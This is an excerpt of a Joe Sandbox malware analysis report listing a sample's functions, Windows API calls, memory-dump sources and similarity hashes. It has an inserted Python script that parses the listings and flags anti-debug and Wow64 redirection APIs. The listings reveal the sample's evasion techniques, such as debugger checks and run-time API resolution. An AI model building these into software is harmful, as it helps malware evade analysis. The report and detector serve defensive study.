• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ChangeCloseErrorFindLastNotification__dosmaperr
• String ID:
• API String ID: 490808831-0
• Opcode ID: 03449d4bee9d9688ea22a59bb7e4d042215c4de7dc673a7868299af89d719fd3
• Instruction ID: 675a196ca2ac308d767e800791ec1f9f8a6b519c2b2d1ff12709e982764225df
• Opcode Fuzzy Hash: 03449d4bee9d9688ea22a59bb7e4d042215c4de7dc673a7868299af89d719fd3
• Instruction Fuzzy Hash: 40012632E055606AC624A278AC46F7F6B4D4BC5734F2A061FF8148B1D2DF759EC24193
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,009C97BA,FF8BC369,00000000,00000002,00000000), ref: 009C9744
• GetLastError.KERNEL32(?,009C97BA,FF8BC369,00000000,00000002,00000000,?,009C5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,009B6F41), ref: 009C974E
• __dosmaperr.LIBCMT ref: 009C9755
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 25bec7304d44559b789a22850b86270585343f611ba647979eb41b1b1fb96b62
• Instruction ID: 0bf45ce8048dc995c15d1a6427afcc4f25d2bcfdacb4ba7230df3dc3dab25297
• Opcode Fuzzy Hash: 25bec7304d44559b789a22850b86270585343f611ba647979eb41b1b1fb96b62
• Instruction Fuzzy Hash: B8014C32A20518EBCB15DF99DC09EAE3B2DEBC5330B24021DF8119B190EB70DE529B91
APIs
• TranslateMessage.USER32(?), ref: 0099F27B
• DispatchMessageW.USER32(?), ref: 0099F289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0099F29F
• Sleep.KERNEL32(0000000A), ref: 0099F2B1
• TranslateAcceleratorW.USER32(?,?,?), ref: 009E32D8
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
• Opcode ID: 1de68ef111d538b54c915dfc7529a078cc8fe1450015f76fa689988070ace037
• Instruction ID: bf1ca5c5110755f3962e8f33f1f5d4fc1fa75be4aa30d6ac02006c35e8b1f734
• Opcode Fuzzy Hash: 1de68ef111d538b54c915dfc7529a078cc8fe1450015f76fa689988070ace037
• Instruction Fuzzy Hash: 7CF082302043849BEB70CBE8CC49FEA73ACEB84300F104929E659D30C0DB749589CB25
APIs
• __Init_thread_footer.LIBCMT ref: 009A3006
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: CALL
• API String ID: 1385522511-4196123274
• Opcode ID: c027909b5cde17548e87feb4eee59f0552374b2d6725c0972e34ffc463186223
• Instruction ID: fd50ec784ca86968fd7a3807a4890ee301a66b8a1299d5a14afc5f6230bdc899
• Opcode Fuzzy Hash: c027909b5cde17548e87feb4eee59f0552374b2d6725c0972e34ffc463186223
• Instruction Fuzzy Hash: 7B225A706082419FC714DF28C884B2ABBF5BF96314F24895DF4968B3A2D775ED81CB92
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 962f486d3033b06dab87e1facfc9e92b6e37111db3c5376f1bb61235084d4783
• Instruction ID: 94bc35659c423b88508e33072856ea9a4c78b59f44750cd3d1bf246d4072ce96
• Opcode Fuzzy Hash: 962f486d3033b06dab87e1facfc9e92b6e37111db3c5376f1bb61235084d4783
• Instruction Fuzzy Hash: 62320F30A00245EFDF24DF59D881BAEB7B9FF61360F148918E855AB2A1E735ED40CB91
APIs
• GetOpenFileNameW.COMDLG32(?), ref: 009D413B
  • Part of subcall function 00995851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009955D1,?,?,009D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00995871
  • Part of subcall function 00993A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00993A76
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                  • String ID: X
                                                                                                                                                                                                                                  • API String ID: 779396738-3081909835
                                                                                                                                                                                                                                  • Opcode ID: 4e18e199453a39c196b044a7847921d0a37a815f7a58098484e1910363920f13
                                                                                                                                                                                                                                  • Instruction ID: dc1206c84ef860c562c370b9a309dc5a1ae9f3a75b2f76021d3b29728c378188
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e18e199453a39c196b044a7847921d0a37a815f7a58098484e1910363920f13
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23218171A042589BDF11DF98D805BEE7BFCAF89314F00805AE545B7241DBB89A898FA1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotificationSleep
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1821831730-0
                                                                                                                                                                                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                  • Instruction ID: 6fe08a3fb22f9ce8f0c236edd0883a95674c777432ba08e0f78fa9c6477620ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7431E870A00105DFC718EF58D694AAAF7B5FF99320B6486A5E409CB252DB36EDC1CBD0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00A0DB39: _wcslen.LIBCMT ref: 00A0DB75
                                                                                                                                                                                                                                    • Part of subcall function 00A0DB39: InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A0DB7F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00A0CE10
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00A0CE24
                                                                                                                                                                                                                                    • Part of subcall function 00A0D81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D844
                                                                                                                                                                                                                                    • Part of subcall function 00A0D81C: InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D86B
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CEF5
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A0CF08
                                                                                                                                                                                                                                    • Part of subcall function 00A0CEBB: SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A0CF1C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$ErrorEventLastOptionQuery$ConnectCrack_wcslen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3507849315-0
                                                                                                                                                                                                                                  • Opcode ID: 63166d9a731c2757db4fd59c80db6df6969941607f1923816ac8b19e8614609b
                                                                                                                                                                                                                                  • Instruction ID: edd348fa1255acaa158c06972339e9a94a3a321abd3eac05f9b3ddfea2e509ad
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63166d9a731c2757db4fd59c80db6df6969941607f1923816ac8b19e8614609b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F32126B290060C9BCF30AFB4E944AAF77BDAF04360B10461AE552971D2DA35D549DBA0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00993A3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: IconNotifyShell_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1144537725-0
                                                                                                                                                                                                                                  • Opcode ID: 3060cb7b5c1d5023c04f44dc11d64d19ddce637ab20b76c2ceb1db945c57bf47
                                                                                                                                                                                                                                  • Instruction ID: e2cde2ba8519f123d1762b15febc5ad6bfc71123f4dbf64dcc38cc9d5a9e2810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3060cb7b5c1d5023c04f44dc11d64d19ddce637ab20b76c2ceb1db945c57bf47
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6317C706057018FE720DF69D8857A7BBF8FB89318F00092EE6D987241E7B5A949CB52
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D844
                                                                                                                                                                                                                                  • InternetQueryOptionW.WININET(00000000,00000026,00000000,?), ref: 00A0D86B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InternetOptionQuery
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2202126096-0
                                                                                                                                                                                                                                  • Opcode ID: 1921bfe27accfdfab47241159257ea78c2ec250a3f78e518a4231bdeb6efc12d
                                                                                                                                                                                                                                  • Instruction ID: 4f3ee1c7e378a3cb729e6ece3a885790e620119a904099b60f28da217de3fa51
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1921bfe27accfdfab47241159257ea78c2ec250a3f78e518a4231bdeb6efc12d
• Instruction Fuzzy Hash: 89016DB384021C7EDB159FA8DCC5DFB7B6CEB89790B048126FE08AA151D631DD8287A0
APIs
• IsThemeActive.UXTHEME ref: 0099333D
  • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009932FB
  • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00993312
  • Part of subcall function 0099338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00993368,?), ref: 009933BB
  • Part of subcall function 0099338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00993368,?), ref: 009933CE
  • Part of subcall function 0099338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A62418,00A62400,?,?,?,?,?,?,00993368,?), ref: 0099343A
  • Part of subcall function 0099338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009934BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00993377
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
• Opcode ID: 2044cd394440c1a9284590529a7e92d35d186284d833b109fe5fa84f43e8a114
• Instruction ID: b71d08bdd268d17c8ddaf22624e4f58a51661616c1031aa9122e23c6fc2a077b
• Opcode Fuzzy Hash: 2044cd394440c1a9284590529a7e92d35d186284d833b109fe5fa84f43e8a114
• Instruction Fuzzy Hash: E7F05471554B449FE711EFE4ED0FB6437B4A740719F008915F6059A2E2DBF941538B40
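The listing above records an IsDebuggerPresent check reached through subcall function 0099338B, and a later listing in this section shows Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection being resolved at run time through LoadLibraryA/GetProcAddress rather than imported, which is how a 32-bit loader reaches the real System32 on a 64-bit host and also keeps those names out of the import table. The Python script below is an added example, not part of the Joe Sandbox report: it parses listings in exactly this format, rebuilds the "API ID" similarity key shown under "Similarity", and flags anti-analysis API use including names resolved via GetProcAddress. The API ID construction (CamelCase words grouped by frequency, Get/Set/Is/Ex and a trailing A/W dropped, groups joined with "$", CRT names with underscores kept whole) is inferred from the listings on this page and is an assumption, not documented Joe Sandbox behaviour; the watchlist is likewise an assumption. The two sample listings are copied from this section.

```python
"""Triage helper for Joe Sandbox 'APIs' function listings (added example).

Parses the bullet lines of a listing, keeps the subcall attribution, rebuilds
the 'API ID' similarity key the way this page's listings suggest it is built,
and flags anti-analysis APIs, including ones resolved at run time through
GetProcAddress.  The API ID rule and the watchlist are assumptions of this
example, not documented Joe Sandbox behaviour.
"""
import re
from collections import Counter

# One bullet line of an 'APIs' listing.  Parenthesised arguments are optional
# ("__Init_thread_footer.LIBCMT ref: 0099CEEE" has none).
API_LINE = re.compile(
    r"^\s*[•*]\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})",
    re.M,
)

# Words the API IDs on this page drop (assumption inferred from the listings).
STOPWORDS = {"Get", "Set", "Is", "Ex"}

# APIs worth a second look in a sandbox report (assumption, not exhaustive).
WATCHLIST = {
    "IsDebuggerPresent": "anti-debug",
    "CheckRemoteDebuggerPresent": "anti-debug",
    "NtQueryInformationProcess": "anti-debug",
    "Wow64DisableWow64FsRedirection": "wow64-fs-redirection",
    "Wow64RevertWow64FsRedirection": "wow64-fs-redirection",
}

# Two listings copied from this report's function dump, embedded as sample input.
THEME_LISTING = """\
• IsThemeActive.UXTHEME ref: 0099333D
  • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 009932FB
  • Part of subcall function 009932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00993312
  • Part of subcall function 0099338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00993368,?), ref: 009933BB
  • Part of subcall function 0099338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00993368,?), ref: 009933CE
  • Part of subcall function 0099338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00A62418,00A62400,?,?,?,?,?,?,00993368,?), ref: 0099343A
  • Part of subcall function 0099338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00A62418,?,?,?,?,?,?,?,00993368,?), ref: 009934BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00993377
"""
WOW64_LISTING = """\
  • Part of subcall function 0099663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099664A
  • Part of subcall function 0099663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0099665C
  • Part of subcall function 0099663E: FreeLibrary.KERNEL32(00000000,?,?,0099668B,?,?,009962FA,?,00000001,?,?,00000000), ref: 0099666E
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009962FA,?,00000001,?,?,00000000), ref: 009966AB
  • Part of subcall function 00996607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996610
  • Part of subcall function 00996607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00996622
  • Part of subcall function 00996607: FreeLibrary.KERNEL32(00000000,?,?,009D5657,?,?,009962FA,?,00000001,?,?,00000000), ref: 00996635
"""


def parse_apis(listing: str) -> list[dict]:
    """Return one record per API line: name, module, args, ref and owning function."""
    records = []
    for m in API_LINE.finditer(listing):
        args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
        records.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args,
            "ref": m.group("ref"),
            "function": m.group("sub") or "self",   # "self" = the listed function itself
        })
    return records


def _words(api: str) -> list[str]:
    """Split an API name into the words the API ID is built from (assumed rule)."""
    if "_" in api:                                   # CRT helpers keep their name whole
        return [api.lstrip("_")]
    words = re.findall(r"[A-Z][a-z0-9]*", api)
    if words and words[-1] in ("A", "W"):            # drop the ANSI/Unicode suffix
        words.pop()
    return [w for w in words if w not in STOPWORDS]


def api_id(records: list[dict]) -> str:
    """Rebuild the API ID: words grouped by frequency (most frequent first),
    groups joined with '$', words inside a group sorted alphabetically."""
    counts = Counter(w for r in records for w in _words(r["api"]))
    groups: dict[int, list[str]] = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def flag_suspicious(records: list[dict]) -> list[dict]:
    """Flag watchlisted APIs, whether called directly or resolved via GetProcAddress."""
    findings = []
    for r in records:
        name, via = r["api"], "direct"
        if name == "GetProcAddress" and len(r["args"]) >= 2:
            name, via = r["args"][1], "GetProcAddress"   # second argument is the resolved name
        if name in WATCHLIST:
            findings.append({"api": name, "tag": WATCHLIST[name], "via": via,
                             "ref": r["ref"], "function": r["function"]})
    return findings


if __name__ == "__main__":
    for title, listing in (("theme", THEME_LISTING), ("wow64", WOW64_LISTING)):
        recs = parse_apis(listing)
        print(title, "API ID:", api_id(recs))
        for f in flag_suspicious(recs):
            print("  ", f)
```

Run against the two embedded listings the script reproduces the page's own keys, "InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme" and "Library$Load$AddressFreeProc", which is the evidence for the assumed grouping rule; the flagged records carry the subcall address (0099338B, 0099663E, 00996607) so a finding can be tied back to the function that actually performs the check rather than the one whose listing it appears in.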
APIs
• __Init_thread_footer.LIBCMT ref: 0099CEEE
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
• Opcode ID: 194590e6f205533879422ea16c588692078c8e359a9cb9fa52e517bb5aa0d10a
• Instruction ID: 5c8269af45a343e271dab3bbfd315d0cd5b00e6a882cfe8debca153978ebddb5
• Opcode Fuzzy Hash: 194590e6f205533879422ea16c588692078c8e359a9cb9fa52e517bb5aa0d10a
• Instruction Fuzzy Hash: C732BEB5A00245DFDF21CF58C884ABABBB9FF45314F188459E806AB391D775ED82CB90
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID: LoadString
• String ID:
• API String ID: 2948472770-0
• Opcode ID: cf907df2bfd23295c010a9717d4ae198adeb0c81d7f43b4f70c32b34b1c6a903
• Instruction ID: 4893984ba3f4d79893ea902ebf20a5da110f27d52885245384d74e4e0c923761
• Opcode Fuzzy Hash: cf907df2bfd23295c010a9717d4ae198adeb0c81d7f43b4f70c32b34b1c6a903
• Instruction Fuzzy Hash: 80D13A75A08209EFCF14EF98D9819EDBBB5FF48310F144159E915AB291EB31AE81CF90
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
• Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_990000_End.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a075e0eff4cbc7d99ed3f9b3bff862b32f855fa3efb901a0343ff97460dc17c0
• Instruction ID: 0740614f3442f421eb72dcc0662c1a7ce18743841763b5eaf41f4da202a573fe
• Opcode Fuzzy Hash: a075e0eff4cbc7d99ed3f9b3bff862b32f855fa3efb901a0343ff97460dc17c0
• Instruction Fuzzy Hash: 6451E535A00108AFDB10DFA8CD64BE97BA5EF85374F19C178E8289B391D731AD42CB90
APIs
• CharLowerBuffW.USER32(?,?), ref: 009FFCCE
Memory Dump Source
• Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
